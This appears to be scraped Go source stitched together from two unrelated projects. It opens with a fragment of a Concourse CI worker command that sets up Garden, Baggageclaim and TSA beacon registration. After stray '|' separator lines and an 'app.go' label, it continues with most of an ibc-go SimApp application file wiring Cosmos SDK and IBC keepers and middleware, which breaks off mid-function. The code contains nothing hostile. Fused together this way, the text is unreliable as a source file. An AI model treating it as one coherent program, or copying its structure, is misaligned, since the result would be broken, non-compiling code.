TSA tsa.Config `group:"TSA Configuration" namespace:"tsa"`
Certs Certs
WorkDir flag.Dir `long:"work-dir" required:"true" description:"Directory in which to place container data."`
BindIP flag.IP `long:"bind-ip" default:"127.0.0.1" description:"IP address on which to listen for the Garden server."`
BindPort uint16 `long:"bind-port" default:"7777" description:"Port on which to listen for the Garden server."`
PeerIP flag.IP `long:"peer-ip" description:"IP used to reach this worker from the ATC nodes."`
Garden GardenBackend `group:"Garden Configuration" namespace:"garden"`
Baggageclaim baggageclaimcmd.BaggageclaimCommand `group:"Baggageclaim Configuration" namespace:"baggageclaim"`
ResourceTypes flag.Dir `long:"resource-types" description:"Path to directory containing resource types the worker should advertise."`
Logger flag.Lager
}
func (cmd *WorkerCommand) Execute(args []string) error {
runner, err := cmd.Runner(args)
if err != nil {
return err
}
return <-ifrit.Invoke(sigmon.New(runner)).Wait()
}
func (cmd *WorkerCommand) Runner(args []string) (ifrit.Runner, error) {
logger, _ := cmd.Logger.Logger("worker")
worker, gardenRunner, err := cmd.gardenRunner(logger.Session("garden"))
if err != nil {
return nil, err
}
worker.Version = concourse.WorkerVersion
baggageclaimRunner, err := cmd.baggageclaimRunner(logger.Session("baggageclaim"))
if err != nil {
return nil, err
}
members := grouper.Members{
{
Name: "garden",
Runner: gardenRunner,
},
{
Name: "baggageclaim",
Runner: baggageclaimRunner,
},
}
if cmd.TSA.WorkerPrivateKey != nil {
beaconConfig := beacon.Config{
TSAConfig: cmd.TSA,
}
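		// Registration mode (as chosen below): with a peer IP the worker
		// advertises addresses the ATC can reach directly; otherwise Garden and
		// Baggageclaim are forwarded through the TSA connection.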
if cmd.PeerIP.IP != nil {
worker.GardenAddr = fmt.Sprintf("%s:%d", cmd.PeerIP.IP, cmd.BindPort)
worker.BaggageclaimURL = fmt.Sprintf("http://%s:%d", cmd.PeerIP.IP, cmd.Baggageclaim.BindPort)
beaconConfig.Registration.Mode = "direct"
} else {
beaconConfig.Registration.Mode = "forward"
beaconConfig.GardenForwardAddr = fmt.Sprintf("%s:%d", cmd.BindIP.IP, cmd.BindPort)
beaconConfig.BaggageclaimForwardAddr = fmt.Sprintf("%s:%d", cmd.Baggageclaim.BindIP.IP, cmd.Baggageclaim.BindPort)
worker.GardenAddr = beaconConfig.GardenForwardAddr
worker.BaggageclaimURL = fmt.Sprintf("http://%s", beaconConfig.BaggageclaimForwardAddr)
}
members = append(members, grouper.Member{
Name: "beacon",
Runner: concourseWorker.BeaconRunner(
logger.Session("beacon"),
worker,
beaconConfig,
),
})
members = append(members, grouper.Member{
Name: "sweeper",
Runner: sweeper.NewSweeperRunner(
logger,
worker,
beaconConfig,
),
})
}
|
return grouper.NewParallel(os.Interrupt, members), nil
}
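// workerName returns the explicitly configured worker name, falling back to the host name.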
func (cmd *WorkerCommand) workerName() (string, error) {
if cmd.Worker.Name != "" {
return cmd.Worker.Name, nil
}
return os.Hostname()
}
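// baggageclaimRunner configures baggageclaim to keep volumes and overlays under the worker's work dir.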
func (cmd *WorkerCommand) baggageclaimRunner(logger lager.Logger) (ifrit.Runner, error) {
volumesDir := filepath.Join(cmd.WorkDir.Path(), "volumes")
err := os.MkdirAll(volumesDir, 0755)
if err != nil {
return nil, err
}
cmd.Baggageclaim.VolumesDir = flag.Dir(volumesDir)
cmd.Baggageclaim.OverlaysDir = filepath.Join(cmd.WorkDir.Path(), "overlays")
return cmd.Baggageclaim.Runner(nil)
}
| |
app.go
|
package simapp
import (
"encoding/json"
"io"
"net/http"
"os"
"path/filepath"
"github.com/gorilla/mux"
"github.com/rakyll/statik/fs"
"github.com/spf13/cast"
abci "github.com/tendermint/tendermint/abci/types"
"github.com/tendermint/tendermint/libs/log"
tmos "github.com/tendermint/tendermint/libs/os"
dbm "github.com/tendermint/tm-db"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/client"
"github.com/cosmos/cosmos-sdk/client/grpc/tmservice"
"github.com/cosmos/cosmos-sdk/client/rpc"
"github.com/cosmos/cosmos-sdk/codec"
"github.com/cosmos/cosmos-sdk/codec/types"
"github.com/cosmos/cosmos-sdk/server/api"
"github.com/cosmos/cosmos-sdk/server/config"
servertypes "github.com/cosmos/cosmos-sdk/server/types"
"github.com/cosmos/cosmos-sdk/testutil/testdata"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/cosmos/cosmos-sdk/types/module"
"github.com/cosmos/cosmos-sdk/version"
"github.com/cosmos/cosmos-sdk/x/auth"
"github.com/cosmos/cosmos-sdk/x/auth/ante"
authrest "github.com/cosmos/cosmos-sdk/x/auth/client/rest"
authkeeper "github.com/cosmos/cosmos-sdk/x/auth/keeper"
authsims "github.com/cosmos/cosmos-sdk/x/auth/simulation"
authtx "github.com/cosmos/cosmos-sdk/x/auth/tx"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
"github.com/cosmos/cosmos-sdk/x/auth/vesting"
vestingtypes "github.com/cosmos/cosmos-sdk/x/auth/vesting/types"
"github.com/cosmos/cosmos-sdk/x/bank"
bankkeeper "github.com/cosmos/cosmos-sdk/x/bank/keeper"
banktypes "github.com/cosmos/cosmos-sdk/x/bank/types"
"github.com/cosmos/cosmos-sdk/x/capability"
capabilitykeeper "github.com/cosmos/cosmos-sdk/x/capability/keeper"
capabilitytypes "github.com/cosmos/cosmos-sdk/x/capability/types"
simappparams "github.com/cosmos/ibc-go/v3/testing/simapp/params"
"github.com/cosmos/cosmos-sdk/x/crisis"
crisiskeeper "github.com/cosmos/cosmos-sdk/x/crisis/keeper"
crisistypes "github.com/cosmos/cosmos-sdk/x/crisis/types"
distr "github.com/cosmos/cosmos-sdk/x/distribution"
distrclient "github.com/cosmos/cosmos-sdk/x/distribution/client"
distrkeeper "github.com/cosmos/cosmos-sdk/x/distribution/keeper"
distrtypes "github.com/cosmos/cosmos-sdk/x/distribution/types"
"github.com/cosmos/cosmos-sdk/x/evidence"
evidencekeeper "github.com/cosmos/cosmos-sdk/x/evidence/keeper"
evidencetypes "github.com/cosmos/cosmos-sdk/x/evidence/types"
"github.com/cosmos/cosmos-sdk/x/feegrant"
feegrantkeeper "github.com/cosmos/cosmos-sdk/x/feegrant/keeper"
feegrantmodule "github.com/cosmos/cosmos-sdk/x/feegrant/module"
"github.com/cosmos/cosmos-sdk/x/genutil"
genutiltypes "github.com/cosmos/cosmos-sdk/x/genutil/types"
"github.com/cosmos/cosmos-sdk/x/gov"
govkeeper "github.com/cosmos/cosmos-sdk/x/gov/keeper"
govtypes "github.com/cosmos/cosmos-sdk/x/gov/types"
"github.com/cosmos/cosmos-sdk/x/mint"
mintkeeper "github.com/cosmos/cosmos-sdk/x/mint/keeper"
minttypes "github.com/cosmos/cosmos-sdk/x/mint/types"
"github.com/cosmos/cosmos-sdk/x/params"
paramsclient "github.com/cosmos/cosmos-sdk/x/params/client"
paramskeeper "github.com/cosmos/cosmos-sdk/x/params/keeper"
paramstypes "github.com/cosmos/cosmos-sdk/x/params/types"
paramproposal "github.com/cosmos/cosmos-sdk/x/params/types/proposal"
"github.com/cosmos/cosmos-sdk/x/slashing"
slashingkeeper "github.com/cosmos/cosmos-sdk/x/slashing/keeper"
slashingtypes "github.com/cosmos/cosmos-sdk/x/slashing/types"
"github.com/cosmos/cosmos-sdk/x/staking"
stakingkeeper "github.com/cosmos/cosmos-sdk/x/staking/keeper"
stakingtypes "github.com/cosmos/cosmos-sdk/x/staking/types"
"github.com/cosmos/cosmos-sdk/x/upgrade"
upgradeclient "github.com/cosmos/cosmos-sdk/x/upgrade/client"
upgradekeeper "github.com/cosmos/cosmos-sdk/x/upgrade/keeper"
upgradetypes "github.com/cosmos/cosmos-sdk/x/upgrade/types"
ica "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts"
icacontroller "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller"
icacontrollerkeeper "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller/keeper"
icacontrollertypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/controller/types"
icahost "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host"
icahostkeeper "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host/keeper"
icahosttypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/host/types"
icatypes "github.com/cosmos/ibc-go/v3/modules/apps/27-interchain-accounts/types"
ibcfee "github.com/cosmos/ibc-go/v3/modules/apps/29-fee"
ibcfeekeeper "github.com/cosmos/ibc-go/v3/modules/apps/29-fee/keeper"
ibcfeetypes "github.com/cosmos/ibc-go/v3/modules/apps/29-fee/types"
transfer "github.com/cosmos/ibc-go/v3/modules/apps/transfer"
ibctransferkeeper "github.com/cosmos/ibc-go/v3/modules/apps/transfer/keeper"
ibctransfertypes "github.com/cosmos/ibc-go/v3/modules/apps/transfer/types"
ibc "github.com/cosmos/ibc-go/v3/modules/core"
ibcclient "github.com/cosmos/ibc-go/v3/modules/core/02-client"
ibcclientclient "github.com/cosmos/ibc-go/v3/modules/core/02-client/client"
ibcclienttypes "github.com/cosmos/ibc-go/v3/modules/core/02-client/types"
porttypes "github.com/cosmos/ibc-go/v3/modules/core/05-port/types"
ibchost "github.com/cosmos/ibc-go/v3/modules/core/24-host"
ibckeeper "github.com/cosmos/ibc-go/v3/modules/core/keeper"
ibcmock "github.com/cosmos/ibc-go/v3/testing/mock"
authz "github.com/cosmos/cosmos-sdk/x/authz"
authzkeeper "github.com/cosmos/cosmos-sdk/x/authz/keeper"
authzmodule "github.com/cosmos/cosmos-sdk/x/authz/module"
// unnamed import of statik for swagger UI support
_ "github.com/cosmos/cosmos-sdk/client/docs/statik"
)
const appName = "SimApp"
// IBC application testing ports
const (
MockFeePort string = ibcmock.ModuleName + ibcfeetypes.ModuleName
)
var (
// DefaultNodeHome default home directories for the application daemon
DefaultNodeHome string
// ModuleBasics defines the module BasicManager, which is in charge of setting up
// basic, non-dependent module elements, such as codec registration
// and genesis verification.
ModuleBasics = module.NewBasicManager(
auth.AppModuleBasic{},
genutil.AppModuleBasic{},
bank.AppModuleBasic{},
capability.AppModuleBasic{},
staking.AppModuleBasic{},
mint.AppModuleBasic{},
distr.AppModuleBasic{},
gov.NewAppModuleBasic(
paramsclient.ProposalHandler, distrclient.ProposalHandler, upgradeclient.ProposalHandler, upgradeclient.CancelProposalHandler,
ibcclientclient.UpdateClientProposalHandler, ibcclientclient.UpgradeProposalHandler,
),
params.AppModuleBasic{},
crisis.AppModuleBasic{},
slashing.AppModuleBasic{},
ibc.AppModuleBasic{},
feegrantmodule.AppModuleBasic{},
upgrade.AppModuleBasic{},
evidence.AppModuleBasic{},
transfer.AppModuleBasic{},
ibcmock.AppModuleBasic{},
ica.AppModuleBasic{},
authzmodule.AppModuleBasic{},
vesting.AppModuleBasic{},
ibcfee.AppModuleBasic{},
)
// module account permissions
maccPerms = map[string][]string{
authtypes.FeeCollectorName: nil,
distrtypes.ModuleName: nil,
minttypes.ModuleName: {authtypes.Minter},
stakingtypes.BondedPoolName: {authtypes.Burner, authtypes.Staking},
stakingtypes.NotBondedPoolName: {authtypes.Burner, authtypes.Staking},
govtypes.ModuleName: {authtypes.Burner},
ibctransfertypes.ModuleName: {authtypes.Minter, authtypes.Burner},
ibcfeetypes.ModuleName: nil,
icatypes.ModuleName: nil,
}
)
var (
_ App = (*SimApp)(nil)
_ servertypes.Application = (*SimApp)(nil)
)
// SimApp extends an ABCI application, but with most of its parameters exported.
// They are exported for convenience in creating helper functions, as object
// capabilities aren't needed for testing.
type SimApp struct {
*baseapp.BaseApp
legacyAmino *codec.LegacyAmino
appCodec codec.Codec
interfaceRegistry types.InterfaceRegistry
invCheckPeriod uint
// keys to access the substores
keys map[string]*sdk.KVStoreKey
tkeys map[string]*sdk.TransientStoreKey
memKeys map[string]*sdk.MemoryStoreKey
// keepers
AccountKeeper authkeeper.AccountKeeper
BankKeeper bankkeeper.Keeper
CapabilityKeeper *capabilitykeeper.Keeper
StakingKeeper stakingkeeper.Keeper
SlashingKeeper slashingkeeper.Keeper
MintKeeper mintkeeper.Keeper
DistrKeeper distrkeeper.Keeper
GovKeeper govkeeper.Keeper
CrisisKeeper crisiskeeper.Keeper
UpgradeKeeper upgradekeeper.Keeper
ParamsKeeper paramskeeper.Keeper
AuthzKeeper authzkeeper.Keeper
IBCKeeper *ibckeeper.Keeper // IBC Keeper must be a pointer in the app, so we can SetRouter on it correctly
IBCFeeKeeper ibcfeekeeper.Keeper
ICAControllerKeeper icacontrollerkeeper.Keeper
ICAHostKeeper icahostkeeper.Keeper
EvidenceKeeper evidencekeeper.Keeper
TransferKeeper ibctransferkeeper.Keeper
FeeGrantKeeper feegrantkeeper.Keeper
// make scoped keepers public for test purposes
ScopedIBCKeeper capabilitykeeper.ScopedKeeper
ScopedTransferKeeper capabilitykeeper.ScopedKeeper
ScopedIBCFeeKeeper capabilitykeeper.ScopedKeeper
ScopedFeeMockKeeper capabilitykeeper.ScopedKeeper
ScopedICAControllerKeeper capabilitykeeper.ScopedKeeper
ScopedICAHostKeeper capabilitykeeper.ScopedKeeper
ScopedIBCMockKeeper capabilitykeeper.ScopedKeeper
ScopedICAMockKeeper capabilitykeeper.ScopedKeeper
// make IBC modules public for test purposes
// these modules are never directly routed to by the IBC Router
ICAAuthModule ibcmock.IBCModule
FeeMockModule ibcmock.IBCModule
// the module manager
mm *module.Manager
// simulation manager
sm *module.SimulationManager
// the configurator
configurator module.Configurator
}
func init() {
userHomeDir, err := os.UserHomeDir()
if err != nil {
panic(err)
}
DefaultNodeHome = filepath.Join(userHomeDir, ".simapp")
}
// NewSimApp returns a reference to an initialized SimApp.
func NewSimApp(
logger log.Logger, db dbm.DB, traceStore io.Writer, loadLatest bool, skipUpgradeHeights map[int64]bool,
homePath string, invCheckPeriod uint, encodingConfig simappparams.EncodingConfig,
appOpts servertypes.AppOptions, baseAppOptions ...func(*baseapp.BaseApp),
) *SimApp {
appCodec := encodingConfig.Marshaler
legacyAmino := encodingConfig.Amino
interfaceRegistry := encodingConfig.InterfaceRegistry
bApp := baseapp.NewBaseApp(appName, logger, db, encodingConfig.TxConfig.TxDecoder(), baseAppOptions...)
bApp.SetCommitMultiStoreTracer(traceStore)
bApp.SetVersion(version.Version)
bApp.SetInterfaceRegistry(interfaceRegistry)
keys := sdk.NewKVStoreKeys(
authtypes.StoreKey, banktypes.StoreKey, stakingtypes.StoreKey,
minttypes.StoreKey, distrtypes.StoreKey, slashingtypes.StoreKey,
govtypes.StoreKey, paramstypes.StoreKey, ibchost.StoreKey, upgradetypes.StoreKey, feegrant.StoreKey,
evidencetypes.StoreKey, ibctransfertypes.StoreKey, icacontrollertypes.StoreKey, icahosttypes.StoreKey, capabilitytypes.StoreKey,
authzkeeper.StoreKey, ibcfeetypes.StoreKey,
)
tkeys := sdk.NewTransientStoreKeys(paramstypes.TStoreKey)
memKeys := sdk.NewMemoryStoreKeys(capabilitytypes.MemStoreKey)
app := &SimApp{
BaseApp: bApp,
legacyAmino: legacyAmino,
appCodec: appCodec,
interfaceRegistry: interfaceRegistry,
invCheckPeriod: invCheckPeriod,
keys: keys,
tkeys: tkeys,
memKeys: memKeys,
}
app.ParamsKeeper = initParamsKeeper(appCodec, legacyAmino, keys[paramstypes.StoreKey], tkeys[paramstypes.TStoreKey])
// set the BaseApp's parameter store
bApp.SetParamStore(app.ParamsKeeper.Subspace(baseapp.Paramspace).WithKeyTable(paramskeeper.ConsensusParamsKeyTable()))
// add capability keeper and ScopeToModule for ibc module
app.CapabilityKeeper = capabilitykeeper.NewKeeper(appCodec, keys[capabilitytypes.StoreKey], memKeys[capabilitytypes.MemStoreKey])
scopedIBCKeeper := app.CapabilityKeeper.ScopeToModule(ibchost.ModuleName)
scopedTransferKeeper := app.CapabilityKeeper.ScopeToModule(ibctransfertypes.ModuleName)
scopedICAControllerKeeper := app.CapabilityKeeper.ScopeToModule(icacontrollertypes.SubModuleName)
scopedICAHostKeeper := app.CapabilityKeeper.ScopeToModule(icahosttypes.SubModuleName)
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// not replicate if you do not need to test core IBC or light clients.
scopedIBCMockKeeper := app.CapabilityKeeper.ScopeToModule(ibcmock.ModuleName)
scopedFeeMockKeeper := app.CapabilityKeeper.ScopeToModule(MockFeePort)
scopedICAMockKeeper := app.CapabilityKeeper.ScopeToModule(ibcmock.ModuleName + icacontrollertypes.SubModuleName)
// seal capability keeper after scoping modules
app.CapabilityKeeper.Seal()
// SDK module keepers
app.AccountKeeper = authkeeper.NewAccountKeeper(
appCodec, keys[authtypes.StoreKey], app.GetSubspace(authtypes.ModuleName), authtypes.ProtoBaseAccount, maccPerms,
)
app.BankKeeper = bankkeeper.NewBaseKeeper(
appCodec, keys[banktypes.StoreKey], app.AccountKeeper, app.GetSubspace(banktypes.ModuleName), app.ModuleAccountAddrs(),
)
stakingKeeper := stakingkeeper.NewKeeper(
appCodec, keys[stakingtypes.StoreKey], app.AccountKeeper, app.BankKeeper, app.GetSubspace(stakingtypes.ModuleName),
)
app.MintKeeper = mintkeeper.NewKeeper(
appCodec, keys[minttypes.StoreKey], app.GetSubspace(minttypes.ModuleName), &stakingKeeper,
app.AccountKeeper, app.BankKeeper, authtypes.FeeCollectorName,
)
app.DistrKeeper = distrkeeper.NewKeeper(
appCodec, keys[distrtypes.StoreKey], app.GetSubspace(distrtypes.ModuleName), app.AccountKeeper, app.BankKeeper,
&stakingKeeper, authtypes.FeeCollectorName, app.ModuleAccountAddrs(),
)
app.SlashingKeeper = slashingkeeper.NewKeeper(
appCodec, keys[slashingtypes.StoreKey], &stakingKeeper, app.GetSubspace(slashingtypes.ModuleName),
)
app.CrisisKeeper = crisiskeeper.NewKeeper(
app.GetSubspace(crisistypes.ModuleName), invCheckPeriod, app.BankKeeper, authtypes.FeeCollectorName,
)
app.FeeGrantKeeper = feegrantkeeper.NewKeeper(appCodec, keys[feegrant.StoreKey], app.AccountKeeper)
app.UpgradeKeeper = upgradekeeper.NewKeeper(skipUpgradeHeights, keys[upgradetypes.StoreKey], appCodec, homePath, app.BaseApp)
// register the staking hooks
// NOTE: stakingKeeper above is passed by reference, so that it will contain these hooks
app.StakingKeeper = *stakingKeeper.SetHooks(
stakingtypes.NewMultiStakingHooks(app.DistrKeeper.Hooks(), app.SlashingKeeper.Hooks()),
)
app.AuthzKeeper = authzkeeper.NewKeeper(keys[authzkeeper.StoreKey], appCodec, app.BaseApp.MsgServiceRouter())
// IBC Keepers
app.IBCKeeper = ibckeeper.NewKeeper(
appCodec, keys[ibchost.StoreKey], app.GetSubspace(ibchost.ModuleName), app.StakingKeeper, app.UpgradeKeeper, scopedIBCKeeper,
)
// register the proposal types
govRouter := govtypes.NewRouter()
govRouter.AddRoute(govtypes.RouterKey, govtypes.ProposalHandler).
AddRoute(paramproposal.RouterKey, params.NewParamChangeProposalHandler(app.ParamsKeeper)).
AddRoute(distrtypes.RouterKey, distr.NewCommunityPoolSpendProposalHandler(app.DistrKeeper)).
AddRoute(upgradetypes.RouterKey, upgrade.NewSoftwareUpgradeProposalHandler(app.UpgradeKeeper)).
AddRoute(ibcclienttypes.RouterKey, ibcclient.NewClientProposalHandler(app.IBCKeeper.ClientKeeper))
app.GovKeeper = govkeeper.NewKeeper(
appCodec, keys[govtypes.StoreKey], app.GetSubspace(govtypes.ModuleName), app.AccountKeeper, app.BankKeeper,
&stakingKeeper, govRouter,
)
// IBC Fee Module keeper
app.IBCFeeKeeper = ibcfeekeeper.NewKeeper(
appCodec, keys[ibcfeetypes.StoreKey], app.GetSubspace(ibcfeetypes.ModuleName),
app.IBCKeeper.ChannelKeeper, // may be replaced with IBC middleware
app.IBCKeeper.ChannelKeeper,
&app.IBCKeeper.PortKeeper, app.AccountKeeper, app.BankKeeper,
)
// ICA Controller keeper
app.ICAControllerKeeper = icacontrollerkeeper.NewKeeper(
appCodec, keys[icacontrollertypes.StoreKey], app.GetSubspace(icacontrollertypes.SubModuleName),
app.IBCKeeper.ChannelKeeper, // may be replaced with middleware such as ics29 fee
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
scopedICAControllerKeeper, app.MsgServiceRouter(),
)
// ICA Host keeper
app.ICAHostKeeper = icahostkeeper.NewKeeper(
appCodec, keys[icahosttypes.StoreKey], app.GetSubspace(icahosttypes.SubModuleName),
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
app.AccountKeeper, scopedICAHostKeeper, app.MsgServiceRouter(),
)
// Create IBC Router
ibcRouter := porttypes.NewRouter()
// Middleware Stacks
// Create Transfer Keeper and pass IBCFeeKeeper as expected Channel and PortKeeper
// since the fee middleware will wrap the IBCKeeper for the underlying application.
app.TransferKeeper = ibctransferkeeper.NewKeeper(
appCodec, keys[ibctransfertypes.StoreKey], app.GetSubspace(ibctransfertypes.ModuleName),
app.IBCFeeKeeper, // ICS4 Wrapper: fee IBC middleware
app.IBCKeeper.ChannelKeeper, &app.IBCKeeper.PortKeeper,
app.AccountKeeper, app.BankKeeper, scopedTransferKeeper,
)
// Mock Module Stack
// Mock Module setup for testing IBC and also acts as the interchain accounts authentication module
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// not replicate if you do not need to test core IBC or light clients.
mockModule := ibcmock.NewAppModule(&app.IBCKeeper.PortKeeper)
// The mock module is used for testing IBC
mockIBCModule := ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp(ibcmock.ModuleName, scopedIBCMockKeeper))
ibcRouter.AddRoute(ibcmock.ModuleName, mockIBCModule)
// Create Transfer Stack
// SendPacket, since it is originating from the application to core IBC:
// transferKeeper.SendPacket -> fee.SendPacket -> channel.SendPacket
// RecvPacket, message that originates from core IBC and goes down to app, the flow is the other way
// channel.RecvPacket -> fee.OnRecvPacket -> transfer.OnRecvPacket
// transfer stack contains (from top to bottom):
// - IBC Fee Middleware
// - Transfer
// create IBC module from bottom to top of stack
var transferStack porttypes.IBCModule
transferStack = transfer.NewIBCModule(app.TransferKeeper)
transferStack = ibcfee.NewIBCMiddleware(transferStack, app.IBCFeeKeeper)
// Add transfer stack to IBC Router
ibcRouter.AddRoute(ibctransfertypes.ModuleName, transferStack)
// Create Interchain Accounts Stack
// SendPacket, since it is originating from the application to core IBC:
// icaAuthModuleKeeper.SendTx -> icaControllerKeeper.SendPacket -> channel.SendPacket
// initialize ICA module with mock module as the authentication module on the controller side
var icaControllerStack porttypes.IBCModule
icaControllerStack = ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp("", scopedICAMockKeeper))
app.ICAAuthModule = icaControllerStack.(ibcmock.IBCModule)
icaControllerStack = icacontroller.NewIBCMiddleware(icaControllerStack, app.ICAControllerKeeper)
icaHostIBCModule := icahost.NewIBCModule(app.ICAHostKeeper)
// Add host, controller & ica auth modules to IBC router
ibcRouter.
// the ICA Controller middleware needs to be explicitly added to the IBC Router because the
// ICA controller module owns the port capability for ICA. The ICA authentication module
// owns the channel capability.
AddRoute(icacontrollertypes.SubModuleName, icaControllerStack).
AddRoute(icahosttypes.SubModuleName, icaHostIBCModule).
AddRoute(ibcmock.ModuleName+icacontrollertypes.SubModuleName, icaControllerStack) // ica with mock auth module stack route to ica (top level of middleware stack)
// Create Mock IBC Fee module stack for testing
// SendPacket, since it is originating from the application to core IBC:
// mockModule.SendPacket -> fee.SendPacket -> channel.SendPacket
// OnRecvPacket, message that originates from core IBC and goes down to app, the flow is the other way
// channel.RecvPacket -> fee.OnRecvPacket -> mockModule.OnRecvPacket
// OnAcknowledgementPacket as this is where fees are paid out
// mockModule.OnAcknowledgementPacket -> fee.OnAcknowledgementPacket -> channel.OnAcknowledgementPacket
// create fee wrapped mock module
feeMockModule := ibcmock.NewIBCModule(&mockModule, ibcmock.NewMockIBCApp(MockFeePort, scopedFeeMockKeeper))
app.FeeMockModule = feeMockModule
feeWithMockModule := ibcfee.NewIBCMiddleware(feeMockModule, app.IBCFeeKeeper)
ibcRouter.AddRoute(MockFeePort, feeWithMockModule)
// Seal the IBC Router
app.IBCKeeper.SetRouter(ibcRouter)
// create evidence keeper with router
evidenceKeeper := evidencekeeper.NewKeeper(
appCodec, keys[evidencetypes.StoreKey], &app.StakingKeeper, app.SlashingKeeper,
)
// If evidence needs to be handled for the app, set routes in router here and seal
app.EvidenceKeeper = *evidenceKeeper
/**** Module Options ****/
// NOTE: we may consider parsing `appOpts` inside module constructors. For the moment
// we prefer to be more strict in what arguments the modules expect.
var skipGenesisInvariants = cast.ToBool(appOpts.Get(crisis.FlagSkipGenesisInvariants))
// NOTE: Any module instantiated in the module manager that is later modified
// must be passed by reference here.
app.mm = module.NewManager(
// SDK app modules
genutil.NewAppModule(
app.AccountKeeper, app.StakingKeeper, app.BaseApp.DeliverTx,
encodingConfig.TxConfig,
),
auth.NewAppModule(appCodec, app.AccountKeeper, authsims.RandomGenesisAccounts),
vesting.NewAppModule(app.AccountKeeper, app.BankKeeper),
bank.NewAppModule(appCodec, app.BankKeeper, app.AccountKeeper),
capability.NewAppModule(appCodec, *app.CapabilityKeeper),
crisis.NewAppModule(&app.CrisisKeeper, skipGenesisInvariants),
feegrantmodule.NewAppModule(appCodec, app.AccountKeeper, app.BankKeeper, app.FeeGrantKeeper, app.interfaceRegistry),
gov.NewAppModule(appCodec, app.GovKeeper, app.AccountKeeper, app.BankKeeper),
mint.NewAppModule(appCodec, app.MintKeeper, app.AccountKeeper),
slashing.NewAppModule(appCodec, app.SlashingKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
distr.NewAppModule(appCodec, app.DistrKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
staking.NewAppModule(appCodec, app.StakingKeeper, app.AccountKeeper, app.BankKeeper),
upgrade.NewAppModule(app.UpgradeKeeper),
evidence.NewAppModule(app.EvidenceKeeper),
ibc.NewAppModule(app.IBCKeeper),
params.NewAppModule(app.ParamsKeeper),
authzmodule.NewAppModule(appCodec, app.AuthzKeeper, app.AccountKeeper, app.BankKeeper, app.interfaceRegistry),
// IBC modules
transfer.NewAppModule(app.TransferKeeper),
ibcfee.NewAppModule(app.IBCFeeKeeper),
ica.NewAppModule(&app.ICAControllerKeeper, &app.ICAHostKeeper),
mockModule,
)
// During begin block slashing happens after distr.BeginBlocker so that
// there is nothing left over in the validator fee pool, so as to keep the
// CanWithdrawInvariant invariant.
// NOTE: staking module is required if HistoricalEntries param > 0
// NOTE: capability module's beginblocker must come before any modules using capabilities (e.g. IBC)
app.mm.SetOrderBeginBlockers(
upgradetypes.ModuleName, capabilitytypes.ModuleName, minttypes.ModuleName, distrtypes.ModuleName, slashingtypes.ModuleName,
evidencetypes.ModuleName, stakingtypes.ModuleName, ibchost.ModuleName, ibctransfertypes.ModuleName, authtypes.ModuleName,
banktypes.ModuleName, govtypes.ModuleName, crisistypes.ModuleName, genutiltypes.ModuleName, authz.ModuleName, feegrant.ModuleName,
paramstypes.ModuleName, vestingtypes.ModuleName, icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName,
)
app.mm.SetOrderEndBlockers(
crisistypes.ModuleName, govtypes.ModuleName, stakingtypes.ModuleName, ibchost.ModuleName, ibctransfertypes.ModuleName,
capabilitytypes.ModuleName, authtypes.ModuleName, banktypes.ModuleName, distrtypes.ModuleName, slashingtypes.ModuleName,
minttypes.ModuleName, genutiltypes.ModuleName, evidencetypes.ModuleName, authz.ModuleName, feegrant.ModuleName, paramstypes.ModuleName,
upgradetypes.ModuleName, vestingtypes.ModuleName, icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName,
)
// NOTE: The genutils module must occur after staking so that pools are
// properly initialized with tokens from genesis accounts.
// NOTE: Capability module must occur first so that it can initialize any capabilities
// so that other modules that want to create or claim capabilities afterwards in InitChain
// can do so safely.
app.mm.SetOrderInitGenesis(
capabilitytypes.ModuleName, authtypes.ModuleName, banktypes.ModuleName, distrtypes.ModuleName, stakingtypes.ModuleName,
slashingtypes.ModuleName, govtypes.ModuleName, minttypes.ModuleName, crisistypes.ModuleName,
ibchost.ModuleName, genutiltypes.ModuleName, evidencetypes.ModuleName, authz.ModuleName, ibctransfertypes.ModuleName,
icatypes.ModuleName, ibcfeetypes.ModuleName, ibcmock.ModuleName, feegrant.ModuleName, paramstypes.ModuleName, upgradetypes.ModuleName, vestingtypes.ModuleName,
)
app.mm.RegisterInvariants(&app.CrisisKeeper)
app.mm.RegisterRoutes(app.Router(), app.QueryRouter(), encodingConfig.Amino)
app.configurator = module.NewConfigurator(app.appCodec, app.MsgServiceRouter(), app.GRPCQueryRouter())
app.mm.RegisterServices(app.configurator)
// add test gRPC service for testing gRPC queries in isolation
testdata.RegisterQueryServer(app.GRPCQueryRouter(), testdata.QueryImpl{})
// create the simulation manager and define the order of the modules for deterministic simulations
//
// NOTE: this is not required for apps that don't use the simulator for fuzz testing
// transactions
app.sm = module.NewSimulationManager(
auth.NewAppModule(appCodec, app.AccountKeeper, authsims.RandomGenesisAccounts),
bank.NewAppModule(appCodec, app.BankKeeper, app.AccountKeeper),
capability.NewAppModule(appCodec, *app.CapabilityKeeper),
feegrantmodule.NewAppModule(appCodec, app.AccountKeeper, app.BankKeeper, app.FeeGrantKeeper, app.interfaceRegistry),
gov.NewAppModule(appCodec, app.GovKeeper, app.AccountKeeper, app.BankKeeper),
mint.NewAppModule(appCodec, app.MintKeeper, app.AccountKeeper),
staking.NewAppModule(appCodec, app.StakingKeeper, app.AccountKeeper, app.BankKeeper),
distr.NewAppModule(appCodec, app.DistrKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
